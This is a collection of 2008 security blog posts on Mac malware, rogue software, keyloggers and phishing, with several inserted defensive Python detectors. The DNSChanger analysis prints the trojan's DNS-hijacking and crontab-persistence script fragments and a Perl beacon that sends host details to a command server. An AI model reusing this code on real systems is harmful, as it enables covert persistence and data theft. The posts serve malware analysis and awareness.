Thursday, January 31, 2008

Malware Retailers Include Trojan for Mac

As I mentioned last time, it is possible that these retailers will also include a binary for Mac.

Now it's confirmed. As I was browsing my webmaster account this morning, I went to the "Galleries" page (this contains thousands of links to different porn sites) and noticed the name of the codec it is trying to install, "qazcodec4481.exe". I reckon one of the installers of Trojan DNS Changer is "qazcodec1000.dmg".

The installation strategy of this malware always looks like this.

Beware of this trick!

Wednesday, January 30, 2008

Pay-Per-Install: A Malware Retail Business

Organized cyber-criminals have introduced a new retail business: Pay-Per-Install. This business primarily entices webmasters to join the gang and promises to pay $350 for every 1,000 installs.

Like any other business, there's always competition. Another pay-per-install retailer claims to be the best partner.

The deal behind this is that you have to register or sign up for an account. Then, they reply with your login credentials and a link to your installer. The email content looks like this.

Hey John,

Thank you for registering TheInstalls Affiliate program.
We doing the best to help You make more money with us.
You can start right away, everything ready!

Below your login details and URL for EXE:
URL to login:
Login: john
Password: w5yJY6fSgp
EXE (exe generation will take about 30-40 mins):

Remember we offer payments on request for webmasters making more then 10000 installs per day. No shave, no hold, no bullshits, just a lot of MONEY :)

Have a nice day, Dear Partner!
-- TheInstalls team

**Please note that names and password were modified to prevent accidental installation of the malware.**

After logging in to your account, they introduce affiliate bundling promo tools that will help maximize your profit.

This business is a "one stop shop" of malware that includes backdoors, trojans, spyware and worms. You just need to install this tool and they will serve everything for you, including sites, content and all other affiliated binaries. Scary!

So now, the webmaster whose websites serve this pest just needs to log in to his account to check and monitor the count of installs and earnings.

Counting malware infection is now a $$ business!

These binaries are not yet detected by most security software. VirusTotal returned 20% detection out of 32 scanners, and searching for the keyword "pay-per-install" in Google gives 20,000 results. There must be a serious business out there.

As of the moment, this business carries binaries that work only on the Windows platform. But remember, it is possible that this pest will also include a binary for Mac, just like the Zlob codec crossed over and produced Trojan DNSChanger.

Saturday, January 26, 2008

Snoop, Sneak, Sniff

Mac users are more likely to be affected by tracking threats than by malware.

Why? Let's start by defining what a tracking threat is.

Tracking threats are software or applications that snoop on a user's activity, sneak passwords and sniff out private information. Software such as keyloggers and sniffers is considered a tracking threat, and it is widely available over the internet.

This type of software is also classified as grayware. Grayware is not considered malware and is not even dangerous by itself. However, just like a kitchen knife, if it falls into the wrong hands it definitely poses a threat to the user and to other people as well.

Let's take a look at LogKext.

Downloaded file: (107,080 bytes)

LogKext is the only kernel-based freeware keylogger for Mac OS X. It is controlled by a command-line client called logKextClient.

LogKext.pkg is the installer, which contains eight different packages. During the installation process, the user is required to enter the administrator or root password to authenticate.

Below are the packages and their descriptions.

logkextclient.pkg - This package contains logKextClient, a Mac universal binary. This binary is the interactive client of LogKext, which also manages the output logfile, encryption controls and daemon preferences.

logkextdaemon.pkg - This package contains logKextDaemon, a Mac universal binary. This binary is a daemon program that runs in the background and manages the keylogging activity.

logkextkeymap.pkg - This package contains the property list file logKextKeymap.plist. The list includes identifiable keys such as numbers, letters (upper and lower case) and characters.

logkextkeygen.pkg - This package contains logKextKeyGen, a Mac universal binary. This binary is responsible for recording or logging typed keyboard information.

Logkext-1.pkg - This package contains another package named LogKext.kext, which contains the binary file LogKext. LogKext is the main program responsible for intercepting keyboard events, using the IOHIDSystem and IOHIKeyboard classes in the kernel.

logkextReadme.pkg - This package contains LogKext Readme.html, which includes the install and uninstall guide, release notes and frequently asked questions.

logkextuninstall.pkg - This package contains LogKextUninstall.command, a terminal shell script that stops logKext from running and removes its related files.

The packages were installed in this order:


The following files were created:

LogKext Readme.html
/Library/Application Support/logKext/logKextDaemon
/Library/Application Support/logKext/logKextKeyGen
/Library/Application Support/logKext/logKextKeymap.plist

This program can monitor and record a user's keystrokes, including usernames, passwords, PII, private conversations, typed-in URLs and more.

So, imagine if this piece of software went into the wrong hands.

It is scarier when you think you have downloaded and installed a clean application, but behind the undocumented details there are more hidden or unexplained features that could work in the background.

Let's take a look at Keylogger X.

Downloaded file: KeyloggerX.dmg.sit (768,805 bytes)

Inside this image are the following files:

Disclaimer.rtf - This document informs the user that "You are held responsible for your actions". Check the full disclaimer here.

Keylogger X - This is the binary file, in Preferred Executable Format (PEF; its signature starts with "Joy!peffpwpc").

Read Me.rtf - This document describes this program as "Keylogger X is designed to run on OSX. The logged file is saved in the users preference folder called "User Preferences". "

Ok, let's run and check this program. Oops, there's nothing on your screen, and you cannot even find the "User Preferences" folder. Where is it? Nobody knows!

Is it running in the background?

Upon checking the code, this program imports 3 containers with over 900 imported symbols, including multimedia and networking.
In the data section, you will find more interesting strings.

Congratulations! You just installed a "more efficient keylogger".

The behavior of this program is not acceptable and is an absolutely real threat to users.

Monday, January 21, 2008

Let's Go Retro with Macro

Macro viruses started in the late 1990s, and since then they have never stopped. There are thousands of threats found in MS Office for Windows, and they exist in documents like Word, Excel, PowerPoint, Access, Visio and Project. The impact of these threats varies from very destructive behaviour, like deleting files, to annoying scary jokes.

Although today these threats are not as aggressive as we saw 10 years ago, they still exist. It is important to understand the possibility that one day this threat may affect Mac users as well.

What is a Macro?

It is a symbol, name or key that represents a list of commands, actions or keystrokes. It is used to automate repetitive tasks. It is commonly seen in documents like Word, Excel, PowerPoint and even Outlook.

How is a Macro created?

There are two ways:

(1) Macro Recorder

The macro recorder can create simple macros by recording the user's actions or keystrokes and associating them with a shortcut key. So, the user can easily play back the recorded macro as often as needed.

For example, I want to display the words "Useful Macro" in a Word document whenever I type the shortcut key Control+R. This can be done by simply recording it. Check the screenshot here.

By default this is stored in, which means the recorded macro will work in every single document opened.

(2) Visual Basic Editor (VBE)

Advanced macros use Visual Basic for Applications programming.

For further discussion, check your favorite search engine with the following keywords: VBA, Visual Basic for Applications programming, Macros with VBE.

What makes a Macro a threat?

Old macro viruses use commands such as AutoExec, AutoNew, AutoOpen, AutoClose and AutoExit. These are auto macros that have the ability to execute automatically, without the user running anything. However, recent malicious documents are not limited to these commands.
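As an added example (not code from the original post), a small scanner over exported VBA source that reports the auto-executing entry points named above; it also covers the event-handler names (Document_Open, Workbook_Open and the like) that newer documents use in place of the classic auto macros. The sample module is constructed for the demo.

```python
import re

# Procedures Office runs on its own when a document is opened, created or
# closed. The first five are the classic Word auto macros named in the post;
# the rest are the document/workbook event handlers used by newer macro malware.
AUTO_EXEC_NAMES = (
    "AutoExec", "AutoNew", "AutoOpen", "AutoClose", "AutoExit",
    "Document_Open", "Document_Close", "Document_New",
    "Workbook_Open", "Workbook_Close", "Auto_Open", "Auto_Close",
)

# Matches a VBA procedure header such as "Private Sub AutoOpen()" or
# "Function Auto_Open()" at the start of a line, case-insensitively,
# with optional Public/Private/Friend and Static modifiers.
_PROC_RE = re.compile(
    r"^\s*(?:(?:Public|Private|Friend)\s+)?(?:Static\s+)?(Sub|Function)\s+"
    r"([A-Za-z_][A-Za-z0-9_]*)\s*\(",
    re.IGNORECASE | re.MULTILINE,
)


def find_auto_exec_procs(vba_source: str) -> list:
    """Return the names of auto-executing procedures declared in VBA source.

    Names are compared case-insensitively (VBA itself is case-insensitive)
    and returned in the order they appear, without duplicates.
    """
    wanted = {n.lower() for n in AUTO_EXEC_NAMES}
    found = []
    for _kind, name in _PROC_RE.findall(vba_source):
        if name.lower() in wanted and name not in found:
            found.append(name)
    return found


# Constructed sample module: one harmless recorded macro (like the "Useful
# Macro" example in the post) and two procedures that would run on open.
SAMPLE_MODULE = '''
Sub UsefulMacro()
    Selection.TypeText Text:="Useful Macro"
End Sub

Private Sub AutoOpen()
    MsgBox "this ran without you asking"
End Sub

Public Sub Workbook_Open()
End Sub
'''

if __name__ == "__main__":
    print(find_auto_exec_procs(SAMPLE_MODULE))  # ['AutoOpen', 'Workbook_Open']
```

The VBA source itself has to be exported first (from the Visual Basic Editor, or with a tool that extracts the VBA project from the document); this scanner only does the triage on the text.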

How would you know if a document has macros?

MS Office displays the warning below if the document you are trying to open has macros.
You can simply click "Disable Macros" and continue working with the document.

By default, the MS Office macro security setting is enabled. You can manually turn this setting on and off from the Application menu: click Preferences and then Security, or press the shortcut key "Command+,".

You can also view the macro code in the Visual Basic Editor by pressing "Alt+F11".

Below are screenshots of real malicious macros in Word, Excel and PowerPoint.

Obviously, these malicious macros work on Windows, but imagine if that code were meant to work on Mac.

In summary, malicious macros are cross-platform threats. They could work on and damage both Mac and Windows PCs. Awareness of these threats is very important in protecting our daily computing lives.

Friday, January 18, 2008

A Deeper Look at MacSweeper

Do you think MacSweeper is not a rogue application? Ok, let's take a deeper look and see what it does.

File Size

MacSweeperSetup.dmg 1.5 MB (1,600,201 bytes) 2.6 MB (2,563,303 bytes)


Like other rogue applications, MacSweeper uses deceptive sales and marketing techniques to get onto users' systems. It does not have the capability to propagate or spread by itself, but it arrives as an ad that redirects users to this bogus webpage.

Behind this page are a SWF flash file and JavaScript that record the traffic and clicks.

After the fake display of a scanning process, this bogus website displays an Alert box.

The buttons "Ignore" and "Remove" are useless, since it will continue to display another message box, and this time the user has no other option but to click "OK". Check the screenshot here.

Clicking "OK" triggers the download of MacSweeperSetup.dmg. Inside this DMG file is the rogue application -

MacSweeper does not require the root/admin password to execute, and it remains in the Downloads folder unless the user manually drags it to another location.


Lookup information of A NS NS

The screenshot shows that,, and share the same name server IP address.

Cleanator is a rogue application that works on the Windows platform.

Behaviour & Analysis

Most of the files inside are image files (in PNG format). Let's check the other files...

PkgInfo contains the string "APPL????".

Database.plist contains 6,390 cookie entries that look like this:


TODO.txt contains a list of things to do, including its current limitations, bugs and features. An interesting entry from this text file is this:

"18. When update in process arert of new version can come, and fuck everithing"

You may check the complete list here.

Info.plist contains the following strings:

Identifier: com.KIVViSoftware.MacSweeper
Package Type: APPL
Executable: MacSweeper
Update URL:

The file MacSweeper inside the MacOS folder is a universal binary, which means it could work on both PPC and x86.

From the screenshot above, you would think that this application has scanned for unwanted files on your system. However, in the background, MacSweeper executes the following shell commands (the %@ tokens are Objective-C format-string placeholders that the application fills in with paths at runtime):

find "%@" ! -empty -and -type f > /private/tmp/com.MacSweeper.found.tmp;
file -f /private/tmp/com.MacSweeper.found.tmp -kn | grep 'universal binary' | sed -e 's/: *Mach.*//g' > /private/tmp/com.MacSweeper.found2.tmp;

lipo "%@" -thin %@ -output "%@.lipo"&& mv -f "%@.lipo" "%@";

During the scanning process, it drops the following temporary files:


It then uses these files to display the scan result. This application does not scan for unwanted files; instead it gives you a list of legitimate files installed on your system.

And it does not end here: a few minutes after displaying the scan result, it will display a nagging screen as shown below:

What! A privacy violation with your own legitimate files? Absolutely not right.

From the code, this application unlocks more features and displays the message below once the user inputs a valid serial code.

Thank You! You made me a bit hapier :)

Definitely, this application is not just rogue but also junkware.

Wednesday, January 16, 2008

QuickTime 7.4 Fixes Multiple Vulnerabilities

Apple recently released QuickTime 7.4, which includes fixes for multiple vulnerabilities. This new version addresses four issues that affect Mac OS X 10.2.9 or later, Windows Vista and XP SP2.

The vulnerabilities that were addressed include the following:

(1) Memory corruption in QuickTime's handling of Sorenson 3 video files.

(2) Memory corruption in QuickTime's handling of Macintosh Resource records in movie files.

(3) Memory corruption in QuickTime's parsing of Image Descriptor (IDSC) atoms.

(4) Buffer overflow in processing a compressed PICT image.

However, the recent buffer overflow found in QuickTime's RTSP response handling still remains unpatched.

Thus, QuickTime users are advised not to play streaming media that uses the RTSP protocol (rtsp://) until a fix is made available.

Zero Day Exploit: MS Excel Allows Remote Code Execution

There is a zero-day flaw in Microsoft Excel, and this vulnerability affects the following versions:

Microsoft Office Excel 2003 Service Pack 2
Microsoft Office Excel Viewer 2003
Microsoft Office Excel 2002
Microsoft Office Excel 2000
Microsoft Excel 2004 for Mac

What causes this threat?

When a user opens a specially crafted Excel file that has malformed header information, the system encounters an unspecified error, which can be exploited by malicious users and could lead to execution of arbitrary code.

According to Microsoft, there are active attacks currently exploiting this vulnerability. Thus, users are advised not to open untrusted Excel files.

Monday, January 14, 2008

MacSweeper: First Rogue Application on Mac

Beware! The first rogue application for Mac is here.

This rogue application displays fake information, pretending that it is scanning the user's system. It then displays a fake Alert, showing that bad cookies and files were detected.

Once the user clicks "Remove", it downloads MacSweeperSetup.dmg and installs - the rogue application.

There are two images or looks that link to this rogue application.

(1) The screenshot shown above is the image displayed when you visit this URL:

(2) The screenshot shown below is the image displayed when you get linked or redirected (e.g. you have been linked from Google) to this URL:

*** This links to rogue site; Use at your own risk! ***

As of this writing, no security scanners detect it.

MacSweeper does not need the root/admin password to execute. In fact it is just a portable application, and no installation is required. Here's the screenshot below:

Sunday, January 13, 2008

Zero Day Exploit: Buffer Overflow in QuickTime Player

After two QuickTime flaws and the Quickspace worm last December, another vulnerability was discovered this month affecting both Windows and Mac users.

The zero-day vulnerability is triggered when QuickTime encounters an RTSP (Real-Time Streaming Protocol) link, e.g. rtsp://, with no custom port specified: it handles the request by connecting to port 554. However, if port 554 on the server is closed, QuickTime automatically switches to HTTP and tries port 80, where the server returns a 404 error message. If the HTTP error message returned by the server is very long, QuickTime's media link handling does not know how to deal with it, because it lacks input validation, and this causes a buffer overflow.

This vulnerability can be exploited by a malicious application or website, which then allows execution of arbitrary code on the user's system.

Luigi Auriemma, an Italian security researcher, discovered this flaw and posted a bug report with proof-of-concept exploit code.

Thursday, January 10, 2008

Analysis of OSX Trojan DNS Changer

File Size
DMG : ~ 17.1 KB (17,598 bytes)
Installer.pkg : ~132 KB (135,168 bytes)

This malicious code does not spread or propagate by itself. It uses an ancient yet effective social engineering technique to entice users to manually install the program. This trojan disguises itself as a video codec and attaches itself to shared and free video downloads. It was first seen linked to porn sites, but later it was also linked to funny videos and seen on splogs (spam blogs).

Is this in the wild? Yes.

Installation & Behaviour
A user visits a rogue site and downloads a fake video codec. Check the screenshot here.

The disk image file will be automatically mounted but not extracted. This means the user has to manually install the downloaded file.

The downloaded installer, Install.pkg, contains the following files:

Info.plist is the first file invoked during the installation. This file contains detailed usage information and behavior, such as:

Brief description: Microsoft Company
Application Type: MacVideo
Release Version: 1.0
Authorization Action: RootAuthorization
Default Location: /Library/Internet Plug-Ins/
Installed Size: 60
Restart Action: NoRestart

Followed by, which contains information on the files to install.

lsbom -s install.pkg/Contents/

It then accesses the files description.plist and PkgInfo, which give the following information:

Version: 1.0
"Its a suppa puppa desc yo"
Title: MacCodec

PkgInfo: pmkrpkg1

Followed by BundleVersions.plist for version information.

The installer comes with a "License Agreement". Upon clicking "Continue", a message box is displayed requiring the user to click "Agree" to continue the installation process.

Ok, let's look further at the malicious code.

Archive.pax.gz, postinstall, postupgrade, preinstall and preupgrade contain the shell scripts that do the dirty work.

Postinstall and postupgrade contain exactly the same code, as do preinstall and preupgrade.

Preinstall is invoked after the user agrees to the License Agreement. This trojan does not have a damaging payload; it only modifies the user's DNS settings. Let's check the code.

Code Analysis

Preinstall script:

path="/Library/Internet Plug-Ins"
PSID=$( (/usr/sbin/scutil | grep PrimaryService | sed -e 's/.*PrimaryService : //')<<>

Using scutil, it retrieves the user's primary network service (PrimaryService):

get State:/Network/Global/IPv4

It then modifies the DNS name server IPs to
s1= and s2=

d.add ServerAddresses * $s1 $s2
set State:/Network/Service/$PSID/DNS

**Take note: IP addresses may change per variant.

It checks the crontab for an entry referencing plugins.settings, a file located in "/Library/Internet Plug-Ins". This file is a marker; it indicates whether this trojan has previously been installed or not.

exist=`crontab -l|grep plugins.settings`

If plugins.settings does not exist (meaning it was not yet installed), the installation proceeds by dropping a temporary file, cron.inst:

if [ "$exist" == "" ]; then
echo "* * * * * \"$path/plugins.settings\">/dev/null 2>&1" > cron.inst

cron.inst has the following contents:

* * * * * "/Library/Internet Plug-Ins/QuickTime.xpt">/dev/null 2>&1

It then installs cron.inst using the crontab command:

crontab cron.inst

The cron.inst entry executes another script, QuickTime.xpt, which is found in /Library/Internet Plug-Ins/:

"/Library/Internet Plug-Ins/QuickTime.xpt"

In the background, it will create a temporary file named 1.

>/dev/null 2>&1

QuickTime.xpt redirects its output to this file instead of popping errors or script output onto the user's screen.

Once cron.inst has been installed, the preinstall script deletes this temporary file:

rm -rf cron.inst

QuickTime.xpt script:

This script is inside Archive.pax.gz. The installation ends by executing cron.inst, which extracts its contents to /Library/Internet Plug-Ins/.

Like the preinstall script, QuickTime.xpt checks the user's network information, attempts to modify the DNS name server settings, checks for the existence of QuickTime.xpt and, if it exists, creates cron.inst, executes it and deletes the temporary file 1.

Postinstall script:

path="/Library/Internet Plug-Ins/"
/usr/bin/perl "$path/sendreq"
rm -rf "$path/sendreq"

It executes sendreq, which is a Perl script, and then deletes it.

SendReq Script:

This Perl-based bot acts as a backdoor client component and communicates with a remote server through a socket.

use IO::Socket;

It uses MIME base64 encoding to transmit messages through HTTP. The encode_base64 routine embedded in the script (completed below with its sub header and closing braces) is the pure-Perl implementation from the standard MIME::Base64 module.

sub encode_base64 {
    use integer;
    my $eol = $_[1];
    $eol = "\n" unless defined $eol;

    my $res = pack("u", $_[0]);
    # Remove first character of each line, remove newlines
    $res =~ s/^.//mg;
    $res =~ s/\n//g;

    # map the uuencode alphabet onto the base64 alphabet
    $res =~ tr|` -_|AA-Za-z0-9+/|; # `# help emacs
    # fix padding at the end
    my $padding = (3 - length($_[0]) % 3) % 3;
    $res =~ s/.{$padding}$/'=' x $padding/e if $padding;
    # break encoded string into lines of no more than 76 characters each
    if (length $eol) {
        $res =~ s/(.{1,76})/$1$eol/g;
    }
    return $res;
}

The bot command-and-control server:

my $server="";

**Take note: IP addresses may change per variant.

It executes the uname -p command to retrieve the victim's processor type, and hostname to retrieve the host name:

my $cmd=`uname -p;echo ";";hostname`;$cmd=~s/\n//g;

It base64-encodes the gathered information, prefixed with "mac" to mark the platform:

my $uniqid=encode_base64("mac;".$cmd); $uniqid=~s/\n//g;

It builds a request to the remote server, hiding the encoded data in the Accept-Language header:

my $request="GET / HTTP/1.1\r\nAccept-Language: $uniqid\r\nHost: $server\r\n\r\n";

The bot then sends the request to the remote server, establishing a connection over TCP port 80:

my $socket=IO::Socket::INET->new(PeerAddr=>$server,PeerPort=>80,Proto=>"tcp",timeout=>10) or die();
print $socket $request;

Captured packet looks like this:

It sends the victim's information as a base64-encoded string:

GET / HTTP/1.1 Accept-Language: bWFjO2kzODY7cGMtdG9vbHNzLW1hY2Jvb2stcHJvLTE1LmxvY2Fsx Host:

Decoded version:

GET / HTTP/1.1 Accept-Language: mac;i386;xx-toolss-macbook-pro-15.local Host:

From this information, the C&C (command-and-control) server can determine the total count of infections, the IP address and the geographical location of each infected host.
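As an added example (not part of the original post or of the trojan's own scripts), a Python helper that checks for the three artefacts described above: the every-minute crontab entry pointing into /Library/Internet Plug-Ins, resolver addresses that differ from the ones you expect, and the base64 beacon carried in the Accept-Language header. All samples are constructed; the expected resolver set and the scutil output layout are assumptions for the demo.

```python
import base64
import binascii
import re
from typing import Optional

# Locations and marker names taken from the installer scripts quoted above.
PLUGIN_DIR = "/Library/Internet Plug-Ins"
MARKER_NAMES = {"plugins.settings", "QuickTime.xpt"}

# An every-minute crontab entry running something from the plug-ins folder, e.g.
#   * * * * * "/Library/Internet Plug-Ins/QuickTime.xpt">/dev/null 2>&1
CRON_RE = re.compile(
    r'^\*\s+\*\s+\*\s+\*\s+\*\s+"?(' + re.escape(PLUGIN_DIR) + r'/[^">]+?)"?\s*>\s*/dev/null'
)


def suspicious_cron_entries(crontab_text: str) -> list:
    """Return crontab lines (as from `crontab -l`) matching the persistence pattern."""
    hits = []
    for line in crontab_text.splitlines():
        m = CRON_RE.match(line)
        if m and m.group(1).rsplit("/", 1)[-1] in MARKER_NAMES:
            hits.append(line.strip())
    return hits


# Assumed layout of the DNS dictionary scutil prints for a service:
#   ServerAddresses : <array> {
#     0 : 192.0.2.53
#   }
SERVER_RE = re.compile(r"^\s*\d+\s*:\s*(\d{1,3}(?:\.\d{1,3}){3})\s*$", re.MULTILINE)


def unexpected_dns_servers(scutil_dns_text: str, expected: set) -> list:
    """Return resolver addresses present in the scutil output but not in `expected`."""
    return [s for s in SERVER_RE.findall(scutil_dns_text) if s not in expected]


def decode_beacon(http_request: str) -> Optional[dict]:
    """Recover the 'mac;<cpu>;<hostname>' triple sendreq hides in Accept-Language.

    Returns None for anything that is not a well-formed beacon, so an ordinary
    browser header such as 'en-US,en;q=0.5' is left alone.
    """
    m = re.search(r"^Accept-Language:\s*([A-Za-z0-9+/=]+)\s*$", http_request, re.MULTILINE)
    if not m:
        return None
    try:
        decoded = base64.b64decode(m.group(1), validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None
    parts = decoded.split(";")
    if len(parts) != 3 or parts[0] != "mac":
        return None
    return {"platform": parts[0], "cpu": parts[1], "hostname": parts[2]}


# ---- constructed samples (not captured from a real host) ----
SAMPLE_CRONTAB = (
    "0 3 * * * /usr/bin/periodic daily\n"
    '* * * * * "/Library/Internet Plug-Ins/QuickTime.xpt">/dev/null 2>&1\n'
)
SAMPLE_SCUTIL_DNS = (
    "<dictionary> {\n"
    "  ServerAddresses : <array> {\n"
    "    0 : 192.0.2.53\n"
    "    1 : 198.51.100.7\n"
    "  }\n"
    "}\n"
)
# The header value is built the same way sendreq builds it (base64 of the triple).
SAMPLE_BEACON = (
    "GET / HTTP/1.1\r\nAccept-Language: "
    + base64.b64encode(b"mac;i386;example-host.local").decode()
    + "\r\nHost: c2.example.invalid\r\n\r\n"
)

if __name__ == "__main__":
    print(suspicious_cron_entries(SAMPLE_CRONTAB))
    print(unexpected_dns_servers(SAMPLE_SCUTIL_DNS, {"192.0.2.53"}))
    print(decode_beacon(SAMPLE_BEACON))
```

On a real host the inputs would come from `crontab -l` and `scutil --dns` (or the interactive `show State:/Network/Service/<id>/DNS`), and the beacon check from a proxy or packet capture log.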

Furthermore, later versions of this trojan's scripts are obfuscated, making it a little more difficult for security analysts and researchers to read the code.


Trojan DNSChanger is as simple as changing DNS settings: no complications and no destructive behavior. These are simple scripts that are widely available online, built into a Mac installer and deployed to several existing fake codec domains.

The lesson here is that malware or threats on the Mac do not have to be complicated. With the vast information available online, it is possible that an ordinary person without a programming background, also called a script kiddie, can cause interruption and damage to our daily lives.

Sunday, January 6, 2008

Phish Facebook, Phish MySpace too!

Investigating the recent Facebook phishing attack has turned up more information, including MySpace phishing sites and gambling casino spam.

Let's start with this screenshot below.

Let's perform a DNS lookup on the FQDN -

As you can see, this phishing domain runs on a double fast-flux DNS service, which means both the NS and A records are dynamic and constantly changing. Observing the activity further, there are 10 round-robin addresses that change every minute, and this rogue network hosts thousands of domains. So, shutting down these fake sites is not that easy!
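As an added example (not from the original post), a small profiler that turns a series of repeated lookups of one name into the numbers behind that observation: how many distinct addresses and name servers appear, how often each record set changes between consecutive lookups, and whether that pattern looks like single flux (rotating A records) or double flux (rotating NS records too). The lookup data is constructed, and the verdict thresholds are assumptions chosen for the demo.

```python
from typing import Dict, List


def _churn(sets: List[frozenset]) -> float:
    """Fraction of consecutive lookups whose record set differed from the previous one."""
    if len(sets) < 2:
        return 0.0
    changes = sum(1 for prev, cur in zip(sets, sets[1:]) if prev != cur)
    return changes / (len(sets) - 1)


def fast_flux_profile(lookups: List[Dict]) -> Dict:
    """Summarise repeated lookups of one name (e.g. taken one minute apart).

    Each lookup is {"a": [IPv4 strings], "ns": [name server host names]}.
    The thresholds (at least half of the lookups changing, 5+ addresses,
    3+ name servers) are assumptions for this demo, not a published standard.
    """
    a_sets = [frozenset(entry["a"]) for entry in lookups]
    ns_sets = [frozenset(entry["ns"]) for entry in lookups]
    distinct_a = frozenset().union(*a_sets)
    distinct_ns = frozenset().union(*ns_sets)
    a_churn, ns_churn = _churn(a_sets), _churn(ns_sets)
    single = a_churn >= 0.5 and len(distinct_a) >= 5
    return {
        "distinct_a": len(distinct_a),
        "distinct_ns": len(distinct_ns),
        "a_churn": a_churn,
        "ns_churn": ns_churn,
        "single_flux": single,  # the A records rotate
        "double_flux": single and ns_churn >= 0.5 and len(distinct_ns) >= 3,  # NS rotate too
    }


# Constructed sample: four lookups of a double-flux name, a minute apart.
# Ten addresses rotate through the answers and the NS set moves every time.
FLUX_LOOKUPS = [
    {"a": ["198.51.100.1", "198.51.100.2", "198.51.100.3"],
     "ns": ["ns1.example.invalid", "ns2.example.invalid"]},
    {"a": ["198.51.100.4", "198.51.100.5", "198.51.100.6"],
     "ns": ["ns3.example.invalid", "ns4.example.invalid"]},
    {"a": ["198.51.100.7", "198.51.100.8", "198.51.100.9"],
     "ns": ["ns5.example.invalid", "ns6.example.invalid"]},
    {"a": ["198.51.100.10", "198.51.100.1", "198.51.100.2"],
     "ns": ["ns1.example.invalid", "ns3.example.invalid"]},
]

# Constructed sample: an ordinary name whose records never move.
STABLE_LOOKUPS = [
    {"a": ["203.0.113.10"], "ns": ["ns1.example.invalid", "ns2.example.invalid"]}
] * 3

if __name__ == "__main__":
    print(fast_flux_profile(FLUX_LOOKUPS))
    print(fast_flux_profile(STABLE_LOOKUPS))
```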

The screenshot below is a MySpace phishing site.

more links ...

Aside from phishing sites, this node (particularly,) is also responsible for gambling casino spam (6 active mail domains found) and even a marijuana scam (like and

In summary, phishing and scam spam are cross-platform, web-based attacks. They aim to steal your identity and your money!

Mac and iPhone users are not exempt.

Saturday, January 5, 2008

Phishing Facebook Still Up!

Beware! A phishing attack on Facebook has been luring victims for days now, and the site is still up.

This fake website aims to steal your log-in credentials, allowing the attacker to get into your account. This phishing site does not direct the victim to their account; instead, after stealing your information, it sends you on to the legitimate log-in at

This information was first blogged by Scot Fish.

Wednesday, January 2, 2008

Impersonating Mac Browser

As I mentioned in the last topic, Zlob fake codec sites are smart enough to know whether you are running Windows or Mac. If you are an analyst or researcher and would like to download the DMG file, you cannot simply modify the URL or force the browser to download it; although you can change the file extension, the downloaded file will still carry the MZ header, which means a Windows executable.

To understand how this happens, let's capture the HTTP request using Ethereal and check the data.

The user's browser sends a User-Agent header with the request, and this provides information such as the application name, compatibility, platform and version, accepted language and the user's web browser.

So, now you can figure out why.

If you are running Windows and want to download the Zlob fake codec for Macintosh, you can simply send a fake User-Agent header. This means you are sending a hand-crafted HTTP request to the server; this is impersonating the Mac browser.

There are many tools that can help you perform this job; a few names are curl, Fiddler and Malzilla, known as a malware website hunting tool.

The screenshot below shows how Malzilla downloads the DMG file on Windows.

Tuesday, January 1, 2008

Warning! Spyware Found

This is an example of a rogue anti-spyware application. These are software applications that use deceptive sales techniques and false positives to convince users to pay for a license. Their websites look reliable, informative and convincing, usually claiming to be one of the best security software products.

Many of these rogue application websites appear in Google search when using keywords such as IEDefender, Privacy Control, Antispy-pro, WinSpyKiller, spy-bot and the like. These may also reach users via spammed e-mails, pop-ups, banner advertisements and sometimes from other malware.

Does it work on Mac OS X? No (as of this writing). Although some rogue online scanners appear to be working and catching malware on Mac, everything is just for show; they are fakes!

These rogue applications currently support the Windows platform (they download an EXE installer), but like fake codecs, we never know; one day it's gonna be on OS X as well.

For awareness, here's the list of rogue anti-spyware websites.

Have a Malware free day and Happy New Year!